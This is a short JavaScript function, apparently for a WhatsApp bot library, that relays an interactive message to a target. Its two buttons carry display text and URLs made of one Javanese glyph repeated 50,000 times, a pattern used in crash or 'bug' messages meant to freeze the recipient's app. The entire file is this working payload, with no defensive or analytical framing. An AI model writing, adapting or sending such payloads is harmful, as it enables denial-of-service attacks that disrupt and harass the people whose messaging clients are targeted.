async function Test(target) {
  await sock.relayMessage(
    target,
    {
      interactiveMessage: {
        body: {
          text: "Test"
        },

        nativeFlowMessage: {
          buttons: [
            {
              name: "cta_url",

              buttonParamsJson: JSON.stringify({
                display_text: "ꦾ".repeat(50000),
                url: "ꦾ".repeat(50000),
              })
           },
          {
name: "cta_url",

              buttonParamsJson: JSON.stringify({
                display_text: "ꦾ".repeat(50000),
                url: "ꦾ".repeat(50000),
              })
            }
          ]
        }
      }
    },
    {}
  );
}
